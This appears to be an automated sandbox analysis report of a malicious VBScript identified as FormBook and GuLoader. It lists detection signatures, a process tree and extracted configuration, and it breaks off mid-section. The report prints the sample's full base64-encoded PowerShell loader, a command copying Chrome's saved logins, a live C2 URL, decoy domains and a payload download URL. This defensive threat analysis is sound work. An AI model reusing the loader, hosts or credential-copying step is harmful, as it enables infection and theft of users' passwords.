Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report MTIR22024323_0553381487_20220112120005.vbs

Overview

General Information

Sample Name:MTIR22024323_0553381487_20220112120005.vbs
Analysis ID:552589
MD5:564601676bee71f5f61a44ef170d92a6
SHA1:76fca984dab2358e66524172e04a3528f33d8e18
SHA256:5e12314df61fd39cad151a41fb0d3188e437c591fa7498f09f103dea4a46f141
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7072 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwAzACwAMAAsAFsAcgBlAGYAXQAkAGIAaQBkAHIAYQBnAHMAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAFMAbwBjAGkAYQBsAGQAZQBtADcAIABTAEMAQQBMAEQAIABCAG8AZwBnAGwAZQBzACAAcwBpAGsAaAAgAE8AbABpAHMAawBlACAAUwBqAHUAcwBrAGUAbQBhAGwANgAgAGkAbgB2AGUAcwB0AG0AIABFAGwAaQB0ADkAIABNAFUATABUAEkARgBBAEMAVABPACAARgByAHUAZwBhAGwAIABCAHIAbgBlAHAAcwB5ACAARQB4AHAAcgBlAHMAcwAgAEYAcgBkAGUAIABDAE8AUgBSAE8ARABFAFIAIABGAFIATwBOAFQAIABmAGkAdAB0AGkAbAB5AHMAawBlACAARQBwAGkAcABsACAAUAB1AHIAdgBlAHkAIABtAHUAbgBkAHMAawAgAFMAdAB1AGQAZQA0ACAAcwBlAGwAcwBrAGEAIABrAG8AbQBwACAAawBiAGUAcwB1AG0AcwBhAG4AIABBAHUAdABvAHQAbwBtAGkAYwBmACAAVABSAEEASQAgAGwAYQBuAGMAZQB3ACAAVAByAGEAbgBzACAAQgBpAG8AcgB5AHQAbQBlACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAGEAbgBlAGIAZQByAHIAaQBlADIAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwARgBPAFIAUwBWAEEAUgBMAC4AZABhAHQAIgANAAoAIwBCAFIAQQBUAFMAQwBIAEUAUgAgAFAAcgBzAHQAIABGAG8AcgBtAHUAbABlAHIAZQAzACAATgBhAHMAbwBwAGgAYQByAHkAbgAgAE0AbwBuAHQAZwAgAEMATwBOAFQAUgBBAEwAVAAgAE4ATwBOAEMAQQBQAEkATAAgAFYAaQBjAHQAbwByAGkAYQBuADMAIABCAFIATgBEAEUAVgBJAE4AUwAgAE0AeQB6AG8AZAAgAEIAdQBzAGgAZwBhAHMAdABlAHIAIABmAGkAcwBzAHUAcgBlACAAVwBoAGUAcgBlAGUAOQAgAGYAaQBlAGwAZABtAGEAbgAgAEMAbwBsAGEAdQB4AGUAdAAyACAARQBsAHUAYwAyACAAZQBsAG8AaQBnAG4AaQBuAGcAZQAgAFMAdgByAHQAZQBuAGQAZQAgAGgAZQBtAG0AZQBsACAAVABBAEwARQBPACAAUgBrAGUAYgBpACAAUwBUAEoAWQBMAEwAQQBOAEQAUwAgAEsAcgB5AHMAdABhAGwAIABsAGkAZwBlAHMAawBlACAAUwBhAG0AbQBlAG4ANgAgAFQAcgBpAGcAZwA0ACAAcABzAHkAawBvAHQAZQBrACAAQwBPAE0ARQBEAE8AIABlAHUAbABvAGcAaQBjAGEAbAAgAE0AYQByAGsAIAANAAoAJABiAGkAZAByAGEAZwBzADQAPQBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAKAAkAGIAaQBkAHIAYQBnAHMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBDAG8AYwBvAG8AbgBlAGQANgAgAFYAaQBhAHQAaQBjAGEAZABlACAAaQB0AGUAcgBhAHQAaQB2AGIAIABhAHYAaQBzACAASwByAGUAbAByAGUAcgBlAGYAIABvAGIAagBlAGsAdABrAG8AZAAgAHQAYQBsAGkAdABlACAAawBpAGoAZQAgAE0AYQBjAHIANgAgAEcAdQBpAGwAbABvAHQAIABQAFIARQBEAE8AUABTACAAUwB1AGMAYwB1AG0AYgBpAG4ANQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAbwB2AGUAcgBjAG8AbgAiACAADQAKACQAYgBpAGQAcgBhAGcAcwA1AD0AMAA7AA0ACgAjAFcAZQBkAGcAZQB0AGEAaQBsACAAUgBhAHQAaQA2ACAATgBvAHQAYQB0AGUAcwBkAHIAaQAgAE4ATwBOAEgASQBFAFIAIABGAGkAbABlAHQAIABzAHQAaQBmAGYAIABSAGUAYwBhADgAIABGAGwAdQBiAGsAbwBlACAARQBsAGUAYwB0AHIANQAgAEkAbgBkAGUAcwB0AGEAYQBlAG4AIABSAG8AYgBoAGEAaABiAGkAZAByADEAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAGoAbwByAGQAYgByAHUAZwBlAHQAIgAgAA0ACgBbAGIAaQBkAHIAYQBnAHMAMQBdADoAOgBSAGUAYQBkAEYAaQBsAGUAKAAkAGIAaQBkAHIAYQBnAHMANAAsACQAYgBpAGQAcgBhAGcAcwAzACwAMgA2ADcAMQAxACwAWwByAGUAZgBdACQAYgBpAGQAcgBhAGcAcwA1ACwAMAApAA0ACgAjAGMAYQByAGIAbwAgAGoAYQBwAG8AIABtAGkAcwBmACAATQBhAGYAZQA5ACAAawBvAG0AbQB1AG4AZQBzAGYAaQAgAFcAYQByAHIAZQBkAGQAZQBsADEAIABhAGMAZQB0ACAAQwBvAGEAcwB0ADIAIABzAHQAYQB0AHUAIABJAG0AcABlAGQAMgAgAEwAaQB0AHQAZQByADMAIABzAGMAaQByAHIAaABvAHUAcwBzACAAVwBhAGkAawBsAHkAYwBvAHUAMwAgAG4AZQBwAGUAbgB0AGgAIAB0AG8AcgBtACAATABnAGUAcwB0AHUAZABlAHIAIABEAGUAcABvAG4AZQByADYAIABBAEsAVABJAFYAUwBUAE8ARgAgAFMAbABlAGUAIABVAG4AaQBuAHQAcgAgAFIAYQBkAGkAbwBhAHMAdAAgAEEAZgB2AGEAbgBkAHIAZQAyACAAcwBhAGQAZQBsAHQAYQBzACAATABPAFYATwAgAEIAZQBkAHUAIABnAGwAbwBzAHQAcgB1AHAAIABNAEEAQwBVAFMASABMAEEAUQAgAFUAbgB0AHIAbwB0ADcAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEIAZQBzAGcAZQBuADkAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAUgBlAHQAZQBsAGwAaQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAeQBzAHQAZQBtAGYAdQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEEAVABFAFIAUABJAFQASgBPACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATgBHAFMATABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgBhAGwAbABhACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUAbgBkAGUAcgAyACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHMAcAByAHUAaQBrAGUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQwBhAHAAdABpAHYAZQBzAGcAMgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGEAdABoAGkAYQBzAGUAbgBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMASQBHAEkATABMACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE8AUABIAEkATwBMAEEAVABFAFIAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdAByAG4AaQBuAGcAcwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBFAHYAYQBjAHUAYQB0ACIAIAANAAoAWwBiAGkAZAByAGEAZwBzADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAGIAaQBkAHIAYQBnAHMAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoA MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • ieinstal.exe (PID: 5244 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 4540 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • ieinstal.exe (PID: 6256 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autochk.exe (PID: 5460 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
          • cmstp.exe (PID: 3504 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
            • cmd.exe (PID: 5276 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • explorer.exe (PID: 6392 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • explorer.exe (PID: 6664 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • ieinstal.exe (PID: 3232 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
          • ieinstal.exe (PID: 6084 cmdline: "C:\Program Files (x86)\internet explorer\ieinstal.exe" MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}

Threatname: GuLoader

{"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18859:$sqlite3step: 68 34 1C 7B E1
    • 0x1896c:$sqlite3step: 68 34 1C 7B E1
    • 0x18888:$sqlite3text: 68 38 2A 90 C5
    • 0x189ad:$sqlite3text: 68 38 2A 90 C5
    • 0x1889b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189c3:$sqlite3blob: 68 53 D8 7F 8C
    0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b937:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: CMSTP Execution Process CreationShow sources
      Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 3504, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5276
      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUA
      Sigma detected: Suspicious Execution of Powershell with Base64Show sources
